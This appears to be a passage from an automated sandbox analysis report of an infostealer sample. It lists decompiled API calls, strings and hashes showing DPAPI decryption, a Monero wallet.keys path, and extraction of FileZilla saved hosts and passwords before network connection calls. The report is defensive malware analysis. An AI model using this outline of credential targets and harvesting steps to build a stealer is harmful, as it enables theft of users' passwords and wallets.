                          • Opcode Fuzzy Hash: 8bbb84bb6aaf109e494c0f5fefb271528db971104d2b73c5b11516cedf809f00
                          • Instruction Fuzzy Hash: 2AB2F7F350C2049FE304AE29EC8567ABBE9EFD4720F1A893DEAC487744E63558058697
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                          • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID: N@
                          • API String ID: 4291131564-4229412743
                          • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                          • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                          • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                          • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'B#$`(ck$(W^$]SZ$yo
                          • API String ID: 0-3128703432
                          • Opcode ID: 35c74f234dbade45420e1dcbbad3033f90fbd2316ae1de452c65449dcb404173
                          • Instruction ID: 85d02d3626706ca22bcd0319d2293e2f104787a68d8be060f9650a37006f9a2d
                          • Opcode Fuzzy Hash: 35c74f234dbade45420e1dcbbad3033f90fbd2316ae1de452c65449dcb404173
                          • Instruction Fuzzy Hash: EDB2E5F360C200AFE704AE2DEC8567ABBE9EF98760F16453DE6C4C3744E63598058697
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0040C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                          • lstrcat.KERNEL32(?,00420B46), ref: 0040C943
                          • lstrcat.KERNEL32(?,00420B47), ref: 0040C957
                          • lstrcat.KERNEL32(?,00420B4E), ref: 0040C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 0e27517af7786fde1072e19809729dc6fc504a642fc4fdd406e8db63305c5b31
                          • Instruction ID: 8fce10467124e2efb13c7dc6e204b966083c6881a17acb566ee419f20f6b0b4d
                          • Opcode Fuzzy Hash: 0e27517af7786fde1072e19809729dc6fc504a642fc4fdd406e8db63305c5b31
                          • Instruction Fuzzy Hash: AD41A0B9D4421AEFDB10DFE0DD89BEEB7B8BB44304F1042A9E509A62C0D7745A84CF95
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0041696C
                          • sscanf.NTDLL ref: 00416999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004169B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004169C0
                          • ExitProcess.KERNEL32 ref: 004169DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                          • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                          • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                          • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00407254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004072A4
                          • LocalFree.KERNEL32(?), ref: 004072AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                          • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                          • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                          • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                          • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                          • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                          • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                          • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                          • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                          • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Px{^$k:=$y?oY$>g6
                          • API String ID: 0-643451404
                          • Opcode ID: a154b458e494b7dfcc34da0ea74c6bbcee98489c9df9252be5816adfce91379e
                          • Instruction ID: 9afaae43dc458f508aaae2e060c0beb42d825f42e7a171d367b39ab610af20e4
                          • Opcode Fuzzy Hash: a154b458e494b7dfcc34da0ea74c6bbcee98489c9df9252be5816adfce91379e
                          • Instruction Fuzzy Hash: 69B2F6F360C204AFE3046E2DEC8567ABBE9EF94720F1A463DE6C4C3744EA7558058697
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                          • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                          • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                          • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0128D8C8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00417A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0128D8C8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                          • wsprintfA.USER32 ref: 00417AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                          • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                          • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                          • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: N hv$`o$V?w
                          • API String ID: 0-2689779999
                          • Opcode ID: 3154c95c5908c351d139f1df77e55d449680bf68dd411a53c151649a934a1896
                          • Instruction ID: 7f29cfa3e5e9fbb528951ba447c00a495fc54016682efb7e55b99460e9bee0a5
                          • Opcode Fuzzy Hash: 3154c95c5908c351d139f1df77e55d449680bf68dd411a53c151649a934a1896
                          • Instruction Fuzzy Hash: 44B239F3A082009FE304AE2DEC4567AB7E6EFD4320F1A853DEAC5D3744EA7558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: G_w$~[_$*w{
                          • API String ID: 0-3789188570
                          • Opcode ID: 0cd17085173ac4a23225c09256a0ccfce7232490426a46e747ed6aef208cadd7
                          • Instruction ID: 35af049e7bb702c9d153f93e007ceb1d863f3fa7531d4fd35dd8ce92e22a5971
                          • Opcode Fuzzy Hash: 0cd17085173ac4a23225c09256a0ccfce7232490426a46e747ed6aef208cadd7
                          • Instruction Fuzzy Hash: DFB2E5F3A0C2049FE7046E2DEC8567ABBE9EF94720F16493DEAC4C3344EA3558158697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "t|$vo_$}hg
                          • API String ID: 0-3737732124
                          • Opcode ID: 1ebd5e3b2bed53200b37be242472984eb49a307875c5309f47cc58272489f057
                          • Instruction ID: ffcbd222d459af1aa0e5e453792523ef8e7ca55105195078d0c66661ef9a8eb5
                          • Opcode Fuzzy Hash: 1ebd5e3b2bed53200b37be242472984eb49a307875c5309f47cc58272489f057
                          • Instruction Fuzzy Hash: 834207F3A0C2049FD3046E2DEC4567AFBEAEFD4720F1A463DE6C487744EA3598058696
                          APIs
                          • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                          • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                          • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                          • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                          • LocalFree.KERNEL32(?), ref: 00409BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 3b80322b02821ad40be44c2d779127a4b0da0f685be038a0a450de2c4c3011bb
                          • Instruction ID: a7dd7d88ef9fddb89c8ab42ef12d3e8ff20f9c8e15d72f7a6a9a533d2b4962a9
                          • Opcode Fuzzy Hash: 3b80322b02821ad40be44c2d779127a4b0da0f685be038a0a450de2c4c3011bb
                          • Instruction Fuzzy Hash: B211CCB9A00209EFDB04DF94D985AAE77B6FF89300F104569E915A7390D774AE10CF61
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                          • Instruction ID: df6638fc5bd81c094c6f77900714a3576ce2bb2c5a2211ca5e3b78e4b48bff29
                          • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                          • Instruction Fuzzy Hash: 2611E73080110CABDB24FBB0DC559ED7338AF10314F4042AFA00A570D2EF382B9ACB6A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'C`D
                          • API String ID: 0-2050069804
                          • Opcode ID: 01d990a738332316d4947981cba7c60751fd0303b4756bb58cb04cdff24d03cd
                          • Instruction ID: d3c79d26217c8b596662296b85f67b2b4ff9ac69c18b13c76f9ace42127ea19d
                          • Opcode Fuzzy Hash: 01d990a738332316d4947981cba7c60751fd0303b4756bb58cb04cdff24d03cd
                          • Instruction Fuzzy Hash: 956103F2A082149FE310AE28DC8177AB7E5EF84720F06853DEAC487384EA395815C7C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: y~X
                          • API String ID: 0-2759057175
                          • Opcode ID: 981c3b692b31347dfdebde2d5985d56913e070c5333704824325c8cba6ac78e4
                          • Instruction ID: ffcf98a24656c716838450b23467f30817a86d16ce256d0035eafe2c0f53eedf
                          • Opcode Fuzzy Hash: 981c3b692b31347dfdebde2d5985d56913e070c5333704824325c8cba6ac78e4
                          • Instruction Fuzzy Hash: F95158F3E442144BF304692DEC84776B6D6EB94320F29853DDB94877C4E93E98058382
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: _^tw
                          • API String ID: 0-1362795327
                          • Opcode ID: 9199ae279f3c2d7556793103b7506e61c6b739f95523c3d74b7ab5561202caa4
                          • Instruction ID: ae7d3eb2b7159f1853003ff2c76b47758f034b7303073d77c315f437f16e6363
                          • Opcode Fuzzy Hash: 9199ae279f3c2d7556793103b7506e61c6b739f95523c3d74b7ab5561202caa4
                          • Instruction Fuzzy Hash: 0B51F7B3A093149FE304AE39DC84366B7D5EF58720F1A893DDAC8D3384EA7958048787
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 721b9385ac456aca4eb0aa95a34a89fc0779ef8f50c3874e01d404cb022d7c6e
                          • Instruction ID: 461dcea5d173e1b6865f5e48c595a05887298fda5eff11ace0a16d3615fe572b
                          • Opcode Fuzzy Hash: 721b9385ac456aca4eb0aa95a34a89fc0779ef8f50c3874e01d404cb022d7c6e
                          • Instruction Fuzzy Hash: 964126F7A446084BF314AD7ADC44376B796EBD0360F2B863CDA95C77C4EC7998064282
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 493fdf35e9fe501779385be32e29f1ce498db1b5645148ab770fb7aa060cfbaa
                          • Instruction ID: 461c106cb405166df277f244df3d83334c9f9a42c5abab5f9f39bfc31c3c7476
                          • Opcode Fuzzy Hash: 493fdf35e9fe501779385be32e29f1ce498db1b5645148ab770fb7aa060cfbaa
                          • Instruction Fuzzy Hash: 0D41B6B261C600AFE701BF2CDC8567AB7E5EF98724F054A2DEAC4C3300E67598518B93
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 30a4506a59b1153d452a52420fa550c89c37cb5c2adc1e4d8a229149f2fdfab4
                          • Instruction ID: c76a01f3e413bfc04610af01f58d9ad41eff4b90e981a9468d3566c836929432
                          • Opcode Fuzzy Hash: 30a4506a59b1153d452a52420fa550c89c37cb5c2adc1e4d8a229149f2fdfab4
                          • Instruction Fuzzy Hash: 5C41E4B2A085008FE344AE2DDC8577AF7E6EFD8320F1A863DE6D5C3784E93458058682
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84d8a0f648f3ee3273950620d616ee5e6b7d19eab0b8feaf706574830ceedd84
                          • Instruction ID: bd4838141714ac05eb1fe54571b24460b507210e34c505db6e02a9d6cf668a82
                          • Opcode Fuzzy Hash: 84d8a0f648f3ee3273950620d616ee5e6b7d19eab0b8feaf706574830ceedd84
                          • Instruction Fuzzy Hash: 57415CF3A085049BE304AE2DEC9277BF7D6EFD8310F1A863DD699C3784E93558048686
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                            • Part of subcall function 004099C0: LocalFree.KERNEL32(0040148F), ref: 00409A90
                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00410369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 004103DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00410562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00410571
                          • lstrcat.KERNEL32(?,url: ), ref: 00410580
                          • lstrcat.KERNEL32(?,00000000), ref: 00410593
                          • lstrcat.KERNEL32(?,00421678), ref: 004105A2
                          • lstrcat.KERNEL32(?,00000000), ref: 004105B5
                          • lstrcat.KERNEL32(?,0042167C), ref: 004105C4
                          • lstrcat.KERNEL32(?,login: ), ref: 004105D3
                          • lstrcat.KERNEL32(?,00000000), ref: 004105E6
                          • lstrcat.KERNEL32(?,00421688), ref: 004105F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00410604
                          • lstrcat.KERNEL32(?,00000000), ref: 00410617
                          • lstrcat.KERNEL32(?,00421698), ref: 00410626
                          • lstrcat.KERNEL32(?,0042169C), ref: 00410635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: b83ff178b7d5869ad14250963add7427843a330348d9764d8bb8964bcaa99a90
                          • Instruction ID: 638dbb6ae615345b7932def7a19798fabdeecf0a7b17130adc4e1f0da6208cd7
                          • Opcode Fuzzy Hash: b83ff178b7d5869ad14250963add7427843a330348d9764d8bb8964bcaa99a90
                          • Instruction Fuzzy Hash: 23D17E75A41208ABCB04FBF0DD96EEE7379EF14314F50441EF102A6091DF78AA96CB69
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                          • StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00405A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0128E550,00000000,?,01289998,00000000,?,00421A1C), ref: 00405E71
                          • lstrlen.KERNEL32(00000000), ref: 00405E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00405E9A
                          • lstrlen.KERNEL32(00000000), ref: 00405EAF
                          • lstrlen.KERNEL32(00000000), ref: 00405ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00405F1B
